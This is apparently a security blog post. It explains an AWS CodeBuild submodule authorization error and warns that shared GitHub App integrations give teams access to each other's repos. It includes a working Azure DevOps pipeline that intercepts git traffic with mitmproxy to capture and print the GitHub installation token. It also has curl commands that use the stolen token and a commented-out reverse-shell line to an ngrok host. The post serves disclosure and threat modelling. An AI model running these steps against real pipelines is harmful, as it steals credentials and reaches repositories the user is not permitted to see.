Resolving Undocumented AWS CodeBuild Errors and Discussing CI/CD GitHub Integration Security
Resolving an undocumented AWS CodeBuild error and describing GitHub App integration security considerations.
- Introduction
- Problem
- Solution
- Caveats / Gotchas with GitHub Integrations
- >> Important section <<
- Leaking GitHub App Token in ADO
- Summary
Introduction
This is a short post on resolving an AWS CodeBuild pipeline error. I could not find any reference to its solution online, so I thought I would post about it.
Problem
Similar to this AWS post, we were receiving a submodule authorization error:
CLIENT_ERROR: Submodule error authorization failed for primary source and source version
On Stack Overflow, this post seemed related and may be worth mentioning: submodule-error-repository-not-found-for-primary-source-and-source-version
Solution
After much troubleshooting, it seemed the PAT did not have permission to the submodule. When we override (2), we would expect CodeBuild to fetch the submodule with the override credentials. However, the behavior indicates it may have been fetching the submodule with the default PAT credentials.
Once we set the default credential to a GitHub App that had access to both the source repo and the submodule repos, the pipeline started working.
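One way to check this ahead of time is to list the submodule URLs from the repo's .gitmodules file and confirm that the default credential can reach each of them. The following is a minimal sketch of that idea, not part of the original troubleshooting; the function name `submodule_urls` and the sample repo names are hypothetical.

```python
import re

# Hypothetical .gitmodules content; the repo names are placeholders.
SAMPLE_GITMODULES = """
[submodule "libs/shared"]
    path = libs/shared
    url = https://github.com/mycorp/shared-lib.git
[submodule "tools"]
    path = tools
    url = https://github.com/mycorp/build-tools.git
"""


def submodule_urls(gitmodules_text: str) -> dict[str, str]:
    """Map each submodule name to the url declared for it in .gitmodules."""
    urls = {}
    current = None
    for raw in gitmodules_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            # A new section starts; remember its name only if it is a submodule.
            header = re.match(r'^\[submodule "(.+)"\]$', line)
            current = header.group(1) if header else None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            if key.strip() == "url":
                urls[current] = value.strip()
    return urls


if __name__ == "__main__":
    for name, url in submodule_urls(SAMPLE_GITMODULES).items():
        print(f"{name}: {url}")
```

Each URL printed is a repo that the default credential, and not only the override credential, would need to be able to read.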
Caveats / Gotchas with GitHub Integrations
>> Important section <<
When testing the GitHub App connection, we noted that there is only one GitHub App per AWS/GitHub org integration. Therefore, if two teams work in AWS and both need access to GitHub, we create one app, and that app has access to both Team 1's and Team 2's repos. Once we create a connection in AWS, Team 1 can access Team 2's repos and vice versa.
This behavior was examined for both AWS and Azure DevOps integrations (< links here point to the respective GitHub integration apps). I can only speculate that it appears with other platform configurations as well. The Azure DevOps docs do indicate there is a set of permissions to configure, and they walk through mapping GitHub permissions to ADO permissions; however, the docs also comment that the app has access to all repos.
When multiple teams work in one ADO account and we add their repos, we start to get cross-team access to repos. This is an insider threat vector worth noting because, at this point, GitHub repo permissions are irrelevant.
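To make the gap concrete, here is a toy model of the situation. It is only an illustration of the reasoning above and does not reflect how AWS or Azure DevOps implement their connections; all team and repo names are hypothetical. It compares what each team can reach through the shared app installation with what the team was actually granted in GitHub.

```python
# Toy model: one shared GitHub App installation serves every team.
# All team and repo names below are hypothetical placeholders.
github_grants = {
    "team1": {"mycorp/team1-api", "mycorp/team1-web"},
    "team2": {"mycorp/team2-billing"},
}


def installation_repos(grants):
    """Repos the single app must cover: the union of every team's repos."""
    repos = set()
    for team_repos in grants.values():
        repos |= team_repos
    return repos


def excess_access(grants):
    """Per team, repos reachable via the shared connection but not granted in GitHub."""
    reachable = installation_repos(grants)
    return {team: reachable - own for team, own in grants.items()}


if __name__ == "__main__":
    for team, extra in sorted(excess_access(github_grants).items()):
        print(team, "can also reach:", sorted(extra))
```

With a separate app per team, each team's reachable set would equal its own grants and the excess would be empty, which is the boundary we were hoping for.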
We were hoping to split and use different apps for different teams as both a security boundary and also because each app has rate limits; we wanted to ensure one team’s actions did not result in a potential rate limit that affected everyone else.
This configuration is peculiar. GitHub PATs are an alternative, but then you have leakable secrets that need to be managed and rotated frequently. Since CI/CD executes code as a service, it should be possible to use custom GitHub Apps; however, that integration is not as seamless as using the integrated GitHub App for each environment.
An organization needs to weigh the pros and cons of each integration, as these tradeoffs are not readily apparent at first glance.
Leaking GitHub App Token in ADO
As an example, we will look at how to dump the GitHub Installation [basic] token from an ADO pipeline.
The token can be leaked by creating a GitHub repo containing the azure-pipelines.yaml below. The pipeline:
- sets the DevOps Agent variables required to send agent requests through a proxy
- installs mitmproxy and creates a certificate
- initiates a checkout with the git requests running through the proxy and logs them to a file
- reads the file to stdout
pool:
  name: Azure Pipelines
resources:
  repositories:
    - repository: xyz
      type: github
      name: mycorp/test-repo1 ## UPDATE THIS TO CURRENT REPO
      endpoint: mycorp ## UPDATE THIS TO GITHUB CONNECTION IN AZURE DEVOPS
jobs:
  - job: LeakGithubInstallToken
    displayName: "Installing mitmproxy and grabbing git requests"
    variables:
      Agent.ProxyUrl: http://localhost:8888
      Agent.SkipCertVal: true
      Agent.ClientCert: /home/vsts/.mitmproxy/mitmproxy-ca.pem
    steps:
      - script: |
          git config --global http.sslVerify false
          sudo apt update
          sudo apt install mitmproxy -y
          set -ex
          PROXY_PORT=8888
          LOG_FILE="/tmp/proxy.log"
          PROXY_PID_FILE="/tmp/proxy.pid"
          PY_SCRIPT="/tmp/proxy_logger.py"
          # Ensure HOME is correctly set (important for mitmproxy certs)
          export HOME=$(getent passwd "$(whoami)" | cut -d: -f6)
          # Verify mitmdump exists
          command -v mitmdump
          # Ensure mitmproxy certs are generated
          if [ ! -f "$HOME/.mitmproxy/mitmproxy-ca.pem" ]; then
            echo "[*] Generating mitmproxy certs..."
            mitmdump -p 9999 --ssl-insecure --set block_global=false --quiet &
            sleep 2
            kill $!
          fi
          # Write inline Python logger
          cat <<'EOF' > "$PY_SCRIPT"
          from mitmproxy import http
          import base64
          def request(flow: http.HTTPFlow) -> None:
              auth = flow.request.headers.get("Authorization")
              if auth:
                  encoded = base64.b64encode(f"{auth}".replace("basic ", "").encode()).decode()
                  with open("/tmp/proxy.log", "a") as f:
                      f.write("=== AUTHORIZATION HEADER ===\n")
                      f.write(encoded)
                      f.write("=============================\n\n")
          EOF
          # Start mitmdump proxy
          mitmdump -p "$PROXY_PORT" --ssl-insecure -s "$PY_SCRIPT" &
          echo $! > "$PROXY_PID_FILE"
          echo "[*] mitmdump proxy running on port $PROXY_PORT"
          echo "[*] Logging to $LOG_FILE"
          echo "[*] To stop: kill \$(cat $PROXY_PID_FILE)"
        displayName: "Install mitmproxy root CA"
      - checkout: xyz
        persistCredentials: true
      - script: |
          # bash -i >& /dev/tcp/8.tcp.ngrok.io/15776 0>&1 # reverse shell for debugging
          cat /tmp/proxy.log
          echo "Checkouts completed via proxy"
Once the pipeline runs, we can see the CmdLine task output an Authorization Header (base64 encoded so the agent allows printing the value to output). Alternatively, we could have sent this token to an external server if we did not have access to view it in the portal.
ZUMxaFkyTmxjM010ZEc5clpXNDZaMmh6WDAxxYdLakDbmR2VTI1eVNsaHpUMkZtZEd0dFRVMURNR0pWZFdadGNUTnlhWFEzTUE9PQ===============================
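The logged value carries two layers of base64: the logger's own encoding wrapped around the basic credential that git sent. The sketch below peels both layers in Python. It uses a made-up placeholder token rather than the value above, and the helper names `wrap` and `unwrap` are hypothetical. The `x-access-token` username is what the start of the logged sample decodes to.

```python
import base64


def wrap(username: str, token: str) -> str:
    """Rebuild what the logger writes: base64 of the already-base64 basic credential."""
    basic = base64.b64encode(f"{username}:{token}".encode()).decode()
    return base64.b64encode(basic.encode()).decode()


def unwrap(logged: str) -> tuple[str, str]:
    """Peel both layers and split the credential into (username, token)."""
    basic = base64.b64decode(logged).decode()      # layer added by the logger
    credential = base64.b64decode(basic).decode()  # layer from HTTP basic auth
    username, _, token = credential.partition(":")
    return username, token


if __name__ == "__main__":
    # Placeholder only; this is not a real installation token.
    logged = wrap("x-access-token", "ghs_PLACEHOLDER")
    print(unwrap(logged))
```

Only the outer layer needs to be removed before calling the API, since the inner value is already in the form an `Authorization: Basic` header expects.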
We can then use this value to call the GitHub API:
# base64 decode to get the original token (a b64 encoded basic credential)
# the run of '=' after the 'PQ==' padding in the log output is the logger's separator line, not part of the value
token=$(echo 'ZUMxaFkyTmxjM010ZEc5clpXNDZaMmh6WDAxxYdLakDbmR2VTI1eVNsaHpUMkZtZEd0dFRVMURNR0pWZFdadGNUTnlhWFEzTUE9PQ==' | base64 -d)
# Show repos the token can access
page=1
while :; do
  result=$(curl -s -H "Authorization: Basic $token" \
    -H "Accept: application/vnd.github+json" \
    "https://api.github.com/installation/repositories?per_page=100&page=$page")
  echo "$result" | jq -r '.repositories[] | "\(.full_name)"'
  count=$(echo "$result" | jq '.repositories | length')
  [ "$count" -lt 100 ] && break
  page=$((page + 1))
done
# read specific file
repo="mycorp/another-repo"
path="README.md"
curl -sL \
  -H "Accept: application/vnd.github+json" \
  -H "Authorization: Basic $token" \
  -H "X-GitHub-Api-Version: 2022-11-28" \
  "https://api.github.com/repos/$repo/contents/$path" \
  | jq -r '.content' \
  | base64 -d
# add comment to an issue
curl -X POST \
  -H "Authorization: Basic $token" \
  -H "Accept: application/vnd.github+json" \
  https://api.github.com/repos/dteenergy/MSUtil/issues/1/comments \
  -d '{"body": "Comment text"}'
The token may have limited permissions because it is a temporary token created by the GitHub App, and the Azure DevOps backend manages its creation. However, we can clearly access repos that we would not normally be able to see based on our own GitHub permissions.
Summary
Undocumented AWS issues aside, CI/CD security is a finicky topic that should include internal threat modeling. When connecting repositories to GitHub App integrations, take extra care by separating repos into separate GitHub orgs or by using different means of authenticating to the repos. Internal threats are not new, but hopefully, with the knowledge that 60% of breaches are insider threats, that 83% of organizations reported insider attacks in 2024, and that there are new reports of North Korea infiltrating Fortune 500 companies, companies will consider this a very real and serious situation to plan for.